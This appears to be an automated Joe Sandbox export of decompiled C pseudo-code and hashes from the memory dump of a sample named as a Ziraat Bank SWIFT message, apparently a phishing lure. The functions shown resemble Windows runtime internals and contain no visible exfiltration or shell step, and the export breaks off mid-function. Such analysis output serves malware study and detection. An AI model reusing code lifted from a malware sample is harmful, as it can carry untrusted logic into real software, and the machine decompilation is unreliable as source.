                                                                    0x018991d5
                                                                    0x01899239
                                                                    0x01899239
                                                                    0x018991d7
                                                                    0x018991db
                                                                    0x018991e1
                                                                    0x018991e7
                                                                    0x018991fd
                                                                    0x01899203
                                                                    0x0189921e
                                                                    0x01899223
                                                                    0x00000000
                                                                    0x01899223
                                                                    0x01899205
                                                                    0x01899208
                                                                    0x0189920c
                                                                    0x01899214
                                                                    0x01899214
                                                                    0x018991e9
                                                                    0x018991e9
                                                                    0x018991ee
                                                                    0x018991f3
                                                                    0x018991f3
                                                                    0x018991f3
                                                                    0x018991e7
                                                                    0x00000000
                                                                    0x018991db
                                                                    0x01899187
                                                                    0x01899168

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c6a33386deaed6b945917c8750e4433737ec545df5cd35286b0f1a4bf0dcdb29
                                                                    • Instruction ID: 59bd473253e098a7c8e36dce228d12d5ccf71aaeb22334ed6d5ac7d8a0cfc478
                                                                    • Opcode Fuzzy Hash: c6a33386deaed6b945917c8750e4433737ec545df5cd35286b0f1a4bf0dcdb29
                                                                    • Instruction Fuzzy Hash: 6431A2B1E05A45DFDF26DB6CC0887ACBBB5BB88358F1C815DC518E7241C338AA80C762
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 77%
                                                                    			E01916C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
                                                                    				signed short* _v8;
                                                                    				signed char _v12;
                                                                    				void* _t22;
                                                                    				signed char* _t23;
                                                                    				intOrPtr _t24;
                                                                    				signed short* _t44;
                                                                    				void* _t47;
                                                                    				signed char* _t56;
                                                                    				signed char* _t58;
                                                                    
                                                                    				_t48 = __ecx;
                                                                    				_push(__ecx);
                                                                    				_push(__ecx);
                                                                    				_t44 = __ecx;
                                                                    				_v12 = __edx;
                                                                    				_v8 = __ecx;
                                                                    				_t22 = E018B7D50();
                                                                    				_t58 = 0x7ffe0384;
                                                                    				if(_t22 == 0) {
                                                                    					_t23 = 0x7ffe0384;
                                                                    				} else {
                                                                    					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                    				}
                                                                    				if( *_t23 != 0) {
                                                                    					_t24 =  *0x1987b9c; // 0x0
                                                                    					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
                                                                    					_t23 = L018B4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
                                                                    					_t56 = _t23;
                                                                    					if(_t56 != 0) {
                                                                    						_t56[0x24] = _a4;
                                                                    						_t56[0x28] = _a8;
                                                                    						_t56[6] = 0x1420;
                                                                    						_t56[0x20] = _v12;
                                                                    						_t14 =  &(_t56[0x2c]); // 0x2c
                                                                    						E018DF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
                                                                    						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
                                                                    						if(E018B7D50() != 0) {
                                                                    							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                    						}
                                                                    						_push(_t56);
                                                                    						_push(_t47 - 0x20);
                                                                    						_push(0x402);
                                                                    						_push( *_t58 & 0x000000ff);
                                                                    						E018D9AE0();
                                                                    						_t23 = L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
                                                                    					}
                                                                    				}
                                                                    				return _t23;
                                                                    			}












                                                                    0x01916c0a
                                                                    0x01916c0f
                                                                    0x01916c10
                                                                    0x01916c13
                                                                    0x01916c15
                                                                    0x01916c19
                                                                    0x01916c1c
                                                                    0x01916c21
                                                                    0x01916c28
                                                                    0x01916c3a
                                                                    0x01916c2a
                                                                    0x01916c33
                                                                    0x01916c33
                                                                    0x01916c3f
                                                                    0x01916c48
                                                                    0x01916c4d
                                                                    0x01916c60
                                                                    0x01916c65
                                                                    0x01916c69
                                                                    0x01916c73
                                                                    0x01916c79
                                                                    0x01916c7f
                                                                    0x01916c86
                                                                    0x01916c90
                                                                    0x01916c94
                                                                    0x01916ca6
                                                                    0x01916cb2
                                                                    0x01916cbd
                                                                    0x01916cbd
                                                                    0x01916cc3
                                                                    0x01916cc7
                                                                    0x01916ccb
                                                                    0x01916cd0
                                                                    0x01916cd1
                                                                    0x01916ce2
                                                                    0x01916ce2
                                                                    0x01916c69
                                                                    0x01916ced

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a3d3ae05d4765f7c826317464cc1830276af8af14521d8c6e0fdd0a159e4a043
                                                                    • Instruction ID: 3206d8f8e9f5fda8453987bd863f41cd4e87dd0606c67a8eb25e34d131da3586
                                                                    • Opcode Fuzzy Hash: a3d3ae05d4765f7c826317464cc1830276af8af14521d8c6e0fdd0a159e4a043
                                                                    • Instruction Fuzzy Hash: 4E217A72E00649ABD715DB6CD980F6AB7B8FF48740F140069FA09DB791D634EE50CBA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 82%
                                                                    			E018D90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
                                                                    				intOrPtr* _v0;
                                                                    				void* _v8;
                                                                    				signed int _v12;
                                                                    				intOrPtr _v16;
                                                                    				char _v36;
                                                                    				void* _t38;
                                                                    				intOrPtr _t41;
                                                                    				void* _t44;
                                                                    				signed int _t45;
                                                                    				intOrPtr* _t49;
                                                                    				signed int _t57;
                                                                    				signed int _t58;
                                                                    				intOrPtr* _t59;
                                                                    				void* _t62;
                                                                    				void* _t63;
                                                                    				void* _t65;
                                                                    				void* _t66;
                                                                    				signed int _t69;
                                                                    				intOrPtr* _t70;
                                                                    				void* _t71;
                                                                    				intOrPtr* _t72;
                                                                    				intOrPtr* _t73;
                                                                    				char _t74;
                                                                    
                                                                    				_t65 = __edx;
                                                                    				_t57 = _a4;
                                                                    				_t32 = __ecx;
                                                                    				_v8 = __edx;
                                                                    				_t3 = _t32 + 0x14c; // 0x14c
                                                                    				_t70 = _t3;
                                                                    				_v16 = __ecx;
                                                                    				_t72 =  *_t70;
                                                                    				while(_t72 != _t70) {
                                                                    					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
                                                                    						L24:
                                                                    						_t72 =  *_t72;
                                                                    						continue;
                                                                    					}
                                                                    					_t30 = _t72 + 0x10; // 0x10
                                                                    					if(E018ED4F0(_t30, _t65, _t57) == _t57) {
                                                                    						return 0xb7;
                                                                    					}
                                                                    					_t65 = _v8;
                                                                    					goto L24;
                                                                    				}
                                                                    				_t61 = _t57;
                                                                    				_push( &_v12);
                                                                    				_t66 = 0x10;
                                                                    				if(E018CE5E0(_t57, _t66) < 0) {
                                                                    					return 0x216;
                                                                    				}
                                                                    				_t73 = L018B4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
                                                                    				if(_t73 == 0) {
                                                                    					_t38 = 0xe;
                                                                    					return _t38;
                                                                    				}
                                                                    				_t9 = _t73 + 0x10; // 0x10
                                                                    				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
                                                                    				E018DF3E0(_t9, _v8, _t57);
                                                                    				_t41 =  *_t70;
                                                                    				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
                                                                    					_t62 = 3;
                                                                    					asm("int 0x29");
                                                                    					_push(_t62);
                                                                    					_push(_t57);
                                                                    					_push(_t73);
                                                                    					_push(_t70);
                                                                    					_t71 = _t62;
                                                                    					_t74 = 0;
                                                                    					_v36 = 0;
                                                                    					_t63 = E018CA2F0(_t62, _t71, 1, 6,  &_v36);
                                                                    					if(_t63 == 0) {
                                                                    						L20:
                                                                    						_t44 = 0x57;
                                                                    						return _t44;
                                                                    					}
                                                                    					_t45 = _v12;
                                                                    					_t58 = 0x1c;
                                                                    					if(_t45 < _t58) {
                                                                    						goto L20;
                                                                    					}
                                                                    					_t69 = _t45 / _t58;
                                                                    					if(_t69 == 0) {
                                                                    						L19:
                                                                    						return 0xe8;
                                                                    					}
                                                                    					_t59 = _v0;
                                                                    					do {
                                                                    						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
                                                                    							goto L18;
                                                                    						}
                                                                    						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
                                                                    						 *_t59 = _t49;
                                                                    						if( *_t49 != 0x53445352) {
                                                                    							goto L18;
                                                                    						}
                                                                    						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
                                                                    						return 0;
                                                                    						L18:
                                                                    						_t63 = _t63 + 0x1c;
                                                                    						_t74 = _t74 + 1;
                                                                    					} while (_t74 < _t69);
                                                                    					goto L19;
                                                                    				}
                                                                    				 *_t73 = _t41;
                                                                    				 *((intOrPtr*)(_t73 + 4)) = _t70;
                                                                    				 *((intOrPtr*)(_t41 + 4)) = _t73;
                                                                    				 *_t70 = _t73;
                                                                    				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
                                                                    				return 0;
                                                                    			}


























                                                                    0x018d90af
                                                                    0x018d90b8
                                                                    0x018d90bb
                                                                    0x018d90bf
                                                                    0x018d90c2
                                                                    0x018d90c2
                                                                    0x018d90c8
                                                                    0x018d90cb
                                                                    0x018d90cd
                                                                    0x019114d7
                                                                    0x019114eb
                                                                    0x019114eb
                                                                    0x00000000
                                                                    0x019114eb
                                                                    0x019114db
                                                                    0x019114e6
                                                                    0x00000000
                                                                    0x019114f2
                                                                    0x019114e8
                                                                    0x00000000
                                                                    0x019114e8
                                                                    0x018d90d8
                                                                    0x018d90da
                                                                    0x018d90dd
                                                                    0x018d90e5
                                                                    0x00000000
                                                                    0x018d9139
                                                                    0x018d90fa
                                                                    0x018d90fe
                                                                    0x018d9142
                                                                    0x00000000
                                                                    0x018d9142
                                                                    0x018d9104
                                                                    0x018d9107
                                                                    0x018d910b
                                                                    0x018d9110
                                                                    0x018d9118
                                                                    0x018d9147
                                                                    0x018d9148
                                                                    0x018d914f
                                                                    0x018d9150
                                                                    0x018d9151
                                                                    0x018d9152
                                                                    0x018d9156
                                                                    0x018d915d
                                                                    0x018d9160
                                                                    0x018d9168
                                                                    0x018d916c
                                                                    0x018d91bc
                                                                    0x018d91be
                                                                    0x00000000
                                                                    0x018d91be
                                                                    0x018d916e
                                                                    0x018d9173
                                                                    0x018d9176
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018d917c
                                                                    0x018d9180
                                                                    0x018d91b5
                                                                    0x00000000
                                                                    0x018d91b5
                                                                    0x018d9182
                                                                    0x018d9185
                                                                    0x018d9189
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018d918e
                                                                    0x018d9190
                                                                    0x018d9198
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018d91a0
                                                                    0x00000000
                                                                    0x018d91ad
                                                                    0x018d91ad
                                                                    0x018d91b0
                                                                    0x018d91b1
                                                                    0x00000000
                                                                    0x018d9185
                                                                    0x018d911a
                                                                    0x018d911c
                                                                    0x018d911f
                                                                    0x018d9125
                                                                    0x018d9127
                                                                    0x00000000

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                    • Instruction ID: 53c490729f599305a19294d3c719a3cf7fb84640ec5f39dcebb3ca10e8080330
                                                                    • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                    • Instruction Fuzzy Hash: 78218371A00709EFDB21DF69C444A9AFBF8EB54714F14847AEA49D7241D334EE40CB90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 59%
                                                                    			E018C3B7A(void* __ecx) {
                                                                    				signed int _v8;
                                                                    				char _v12;
                                                                    				intOrPtr _v20;
                                                                    				intOrPtr _t17;
                                                                    				intOrPtr _t26;
                                                                    				void* _t35;
                                                                    				void* _t38;
                                                                    				void* _t41;
                                                                    				intOrPtr _t44;
                                                                    
                                                                    				_t17 =  *0x19884c4; // 0x0
                                                                    				_v12 = 1;
                                                                    				_v8 =  *0x19884c0 * 0x4c;
                                                                    				_t41 = __ecx;
                                                                    				_t35 = L018B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x19884c0 * 0x4c);
                                                                    				if(_t35 == 0) {
                                                                    					_t44 = 0xc0000017;
                                                                    				} else {
                                                                    					_push( &_v8);
                                                                    					_push(_v8);
                                                                    					_push(_t35);
                                                                    					_push(4);
                                                                    					_push( &_v12);
                                                                    					_push(0x6b);
                                                                    					_t44 = E018DAA90();
                                                                    					_v20 = _t44;
                                                                    					if(_t44 >= 0) {
                                                                    						E018DFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x19884c0 * 0xc);
                                                                    						_t38 = _t35;
                                                                    						if(_t35 < _v8 + _t35) {
                                                                    							do {
                                                                    								asm("movsd");
                                                                    								asm("movsd");
                                                                    								asm("movsd");
                                                                    								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
                                                                    							} while (_t38 < _v8 + _t35);
                                                                    							_t44 = _v20;
                                                                    						}
                                                                    					}
                                                                    					_t26 =  *0x19884c4; // 0x0
                                                                    					L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
                                                                    				}
                                                                    				return _t44;
                                                                    			}












                                                                    0x018c3b89
                                                                    0x018c3b96
                                                                    0x018c3ba1
                                                                    0x018c3bab
                                                                    0x018c3bb5
                                                                    0x018c3bb9
                                                                    0x01906298
                                                                    0x018c3bbf
                                                                    0x018c3bc2
                                                                    0x018c3bc3
                                                                    0x018c3bc9
                                                                    0x018c3bca
                                                                    0x018c3bcc
                                                                    0x018c3bcd
                                                                    0x018c3bd4
                                                                    0x018c3bd6
                                                                    0x018c3bdb
                                                                    0x018c3bea
                                                                    0x018c3bf7
                                                                    0x018c3bfb
                                                                    0x018c3bff
                                                                    0x018c3c09
                                                                    0x018c3c0a
                                                                    0x018c3c0b
                                                                    0x018c3c0f
                                                                    0x018c3c14
                                                                    0x018c3c18
                                                                    0x018c3c18
                                                                    0x018c3bfb
                                                                    0x018c3c1b
                                                                    0x018c3c30
                                                                    0x018c3c30
                                                                    0x018c3c3d

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e6d0421939be1f5c61bc8c7ef7fe4ece0026124c3ea7af78b3f16f06a3a51ae7
                                                                    • Instruction ID: 1efa02d8f3038313b8cfebe6e20c08d5a8692c468344f0107680a155eccb6805
                                                                    • Opcode Fuzzy Hash: e6d0421939be1f5c61bc8c7ef7fe4ece0026124c3ea7af78b3f16f06a3a51ae7
                                                                    • Instruction Fuzzy Hash: F4217F72A00119AFD715DF58CD81B5EBBADFB44708F154068EA09EB252D371EE129BA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 80%
                                                                    			E01916CF0(void* __edx, intOrPtr _a4, short _a8) {
                                                                    				char _v8;
                                                                    				char _v12;
                                                                    				char _v16;
                                                                    				char _v20;
                                                                    				char _v28;
                                                                    				char _v36;
                                                                    				char _v52;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				void* __ebp;
                                                                    				signed char* _t21;
                                                                    				void* _t24;
                                                                    				void* _t36;
                                                                    				void* _t38;
                                                                    				void* _t46;
                                                                    
                                                                    				_push(_t36);
                                                                    				_t46 = __edx;
                                                                    				_v12 = 0;
                                                                    				_v8 = 0;
                                                                    				_v20 = 0;
                                                                    				_v16 = 0;
                                                                    				if(E018B7D50() == 0) {
                                                                    					_t21 = 0x7ffe0384;
                                                                    				} else {
                                                                    					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
                                                                    				}
                                                                    				if( *_t21 != 0) {
                                                                    					_t21 =  *[fs:0x30];
                                                                    					if((_t21[0x240] & 0x00000004) != 0) {
                                                                    						if(E018B7D50() == 0) {
                                                                    							_t21 = 0x7ffe0385;
                                                                    						} else {
                                                                    							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                    						}
                                                                    						if(( *_t21 & 0x00000020) != 0) {
                                                                    							_t56 = _t46;
                                                                    							if(_t46 == 0) {
                                                                    								_t46 = 0x1875c80;
                                                                    							}
                                                                    							_push(_t46);
                                                                    							_push( &_v12);
                                                                    							_t24 = E018CF6E0(_t36, 0, _t46, _t56);
                                                                    							_push(_a4);
                                                                    							_t38 = _t24;
                                                                    							_push( &_v28);
                                                                    							_t21 = E018CF6E0(_t38, 0, _t46, _t56);
                                                                    							if(_t38 != 0) {
                                                                    								if(_t21 != 0) {
                                                                    									E01917016(_a8, 0, 0, 0,  &_v36,  &_v28);
                                                                    									L018B2400( &_v52);
                                                                    								}
                                                                    								_t21 = L018B2400( &_v28);
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				return _t21;
                                                                    			}



















                                                                    0x01916cfb
                                                                    0x01916d00
                                                                    0x01916d02
                                                                    0x01916d06
                                                                    0x01916d0a
                                                                    0x01916d0e
                                                                    0x01916d19
                                                                    0x01916d2b
                                                                    0x01916d1b
                                                                    0x01916d24
                                                                    0x01916d24
                                                                    0x01916d33
                                                                    0x01916d39
                                                                    0x01916d46
                                                                    0x01916d4f
                                                                    0x01916d61
                                                                    0x01916d51
                                                                    0x01916d5a
                                                                    0x01916d5a
                                                                    0x01916d69
                                                                    0x01916d6b
                                                                    0x01916d6d
                                                                    0x01916d6f
                                                                    0x01916d6f
                                                                    0x01916d74
                                                                    0x01916d79
                                                                    0x01916d7a
                                                                    0x01916d7f
                                                                    0x01916d82
                                                                    0x01916d88
                                                                    0x01916d89
                                                                    0x01916d90
                                                                    0x01916d94
                                                                    0x01916da7
                                                                    0x01916db1
                                                                    0x01916db1
                                                                    0x01916dbb
                                                                    0x01916dbb
                                                                    0x01916d90
                                                                    0x01916d69
                                                                    0x01916d46
                                                                    0x01916dc6

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 13c8f5aead2c77a2985871782bb820fb8a2b9d37833d9be9dd4f7ddf1454b9d5
                                                                    • Instruction ID: 4924bfb5651437e31498c2ff14e953ef12a6b8898aaacd3870cc137ac8c12ae4
                                                                    • Opcode Fuzzy Hash: 13c8f5aead2c77a2985871782bb820fb8a2b9d37833d9be9dd4f7ddf1454b9d5
                                                                    • Instruction Fuzzy Hash: 5B21D3729003499BD711DF2CCD84FA7BBECAF91740F44095ABA44C7265D774D688C6A2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 67%
                                                                    			E0196070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                                                    				char _v8;
                                                                    				intOrPtr _v11;
                                                                    				signed int _v12;
                                                                    				intOrPtr _v15;
                                                                    				signed int _v16;
                                                                    				intOrPtr _v28;
                                                                    				void* __ebx;
                                                                    				char* _t32;
                                                                    				signed int* _t38;
                                                                    				signed int _t60;
                                                                    
                                                                    				_t38 = __ecx;
                                                                    				_v16 = __edx;
                                                                    				_t60 = E019607DF(__ecx, __edx,  &_a4,  &_a8, 2);
                                                                    				if(_t60 != 0) {
                                                                    					_t7 = _t38 + 0x38; // 0x29cd5903
                                                                    					_push( *_t7);
                                                                    					_t9 = _t38 + 0x34; // 0x6adeeb00
                                                                    					_push( *_t9);
                                                                    					_v12 = _a8 << 0xc;
                                                                    					_t11 = _t38 + 4; // 0x5de58b5b
                                                                    					_push(0x4000);
                                                                    					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
                                                                    					E0195AFDE( &_v8,  &_v12);
                                                                    					E01961293(_t38, _v28, _t60);
                                                                    					if(E018B7D50() == 0) {
                                                                    						_t32 = 0x7ffe0380;
                                                                    					} else {
                                                                    						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                    					}
                                                                    					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                    						_t21 = _t38 + 0x3c; // 0xc3595e5f
                                                                    						E019514FB(_t38,  *_t21, _v11, _v15, 0xd);
                                                                    					}
                                                                    				}
                                                                    				return  ~_t60;
                                                                    			}













                                                                    0x0196071b
                                                                    0x01960724
                                                                    0x01960734
                                                                    0x01960738
                                                                    0x0196074b
                                                                    0x0196074b
                                                                    0x01960753
                                                                    0x01960753
                                                                    0x01960759
                                                                    0x0196075d
                                                                    0x01960774
                                                                    0x01960779
                                                                    0x0196077d
                                                                    0x01960789
                                                                    0x01960795
                                                                    0x019607a7
                                                                    0x01960797
                                                                    0x019607a0
                                                                    0x019607a0
                                                                    0x019607af
                                                                    0x019607c4
                                                                    0x019607cd
                                                                    0x019607cd
                                                                    0x019607af
                                                                    0x019607dc

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                    • Instruction ID: f727ecf83ffaabd910c585027ebef8bb499b21f35e1492b3f954f1ced012d565
                                                                    • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                    • Instruction Fuzzy Hash: A421F2362042009FD705DF18CC80B6ABBA9FBD4750F088669F9999B385D634DD09CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 82%
                                                                    			E01917794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                                                    				intOrPtr _v8;
                                                                    				intOrPtr _v12;
                                                                    				intOrPtr _t21;
                                                                    				void* _t24;
                                                                    				intOrPtr _t25;
                                                                    				void* _t36;
                                                                    				short _t39;
                                                                    				signed char* _t42;
                                                                    				unsigned int _t46;
                                                                    				void* _t50;
                                                                    
                                                                    				_push(__ecx);
                                                                    				_push(__ecx);
                                                                    				_t21 =  *0x1987b9c; // 0x0
                                                                    				_t46 = _a8;
                                                                    				_v12 = __edx;
                                                                    				_v8 = __ecx;
                                                                    				_t4 = _t46 + 0x2e; // 0x2e
                                                                    				_t36 = _t4;
                                                                    				_t24 = L018B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
                                                                    				_t50 = _t24;
                                                                    				if(_t50 != 0) {
                                                                    					_t25 = _a4;
                                                                    					if(_t25 == 5) {
                                                                    						L3:
                                                                    						_t39 = 0x14b1;
                                                                    					} else {
                                                                    						_t39 = 0x14b0;
                                                                    						if(_t25 == 6) {
                                                                    							goto L3;
                                                                    						}
                                                                    					}
                                                                    					 *((short*)(_t50 + 6)) = _t39;
                                                                    					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
                                                                    					_t11 = _t50 + 0x2c; // 0x2c
                                                                    					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
                                                                    					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
                                                                    					E018DF3E0(_t11, _a12, _t46);
                                                                    					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
                                                                    					if(E018B7D50() == 0) {
                                                                    						_t42 = 0x7ffe0384;
                                                                    					} else {
                                                                    						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                                    					}
                                                                    					_push(_t50);
                                                                    					_t19 = _t36 - 0x20; // 0xe
                                                                    					_push(0x403);
                                                                    					_push( *_t42 & 0x000000ff);
                                                                    					E018D9AE0();
                                                                    					_t24 = L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
                                                                    				}
                                                                    				return _t24;
                                                                    			}













                                                                    0x01917799
                                                                    0x0191779a
                                                                    0x0191779b
                                                                    0x019177a3
                                                                    0x019177ab
                                                                    0x019177ae
                                                                    0x019177b1
                                                                    0x019177b1
                                                                    0x019177bf
                                                                    0x019177c4
                                                                    0x019177c8
                                                                    0x019177ce
                                                                    0x019177d4
                                                                    0x019177e0
                                                                    0x019177e0
                                                                    0x019177d6
                                                                    0x019177d6
                                                                    0x019177de
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x019177de
                                                                    0x019177e5
                                                                    0x019177f0
                                                                    0x019177f3
                                                                    0x019177f6
                                                                    0x019177fd
                                                                    0x01917800
                                                                    0x0191780c
                                                                    0x01917818
                                                                    0x0191782b
                                                                    0x0191781a
                                                                    0x01917823
                                                                    0x01917823
                                                                    0x01917830
                                                                    0x01917831
                                                                    0x01917838
                                                                    0x0191783d
                                                                    0x0191783e
                                                                    0x0191784f
                                                                    0x0191784f
                                                                    0x0191785a

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1273338e02ca374a511ad2edb0a908a9e6f03e1ad763894d836d26b2690230ab
                                                                    • Instruction ID: 7a4ca68a6dbdcd7fc3f7cd857ec905e000f28d4c4681abaee2ba7b46a7556288
                                                                    • Opcode Fuzzy Hash: 1273338e02ca374a511ad2edb0a908a9e6f03e1ad763894d836d26b2690230ab
                                                                    • Instruction Fuzzy Hash: B921A772500645ABC725DF9DD880E6BB7BDEF48340F10056DF60AC7750D634D900CB95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 96%
                                                                    			E018BAE73(intOrPtr __ecx, void* __edx) {
                                                                    				intOrPtr _v8;
                                                                    				void* _t19;
                                                                    				char* _t22;
                                                                    				signed char* _t24;
                                                                    				intOrPtr _t25;
                                                                    				intOrPtr _t27;
                                                                    				void* _t31;
                                                                    				intOrPtr _t36;
                                                                    				char* _t38;
                                                                    				signed char* _t42;
                                                                    
                                                                    				_push(__ecx);
                                                                    				_t31 = __edx;
                                                                    				_v8 = __ecx;
                                                                    				_t19 = E018B7D50();
                                                                    				_t38 = 0x7ffe0384;
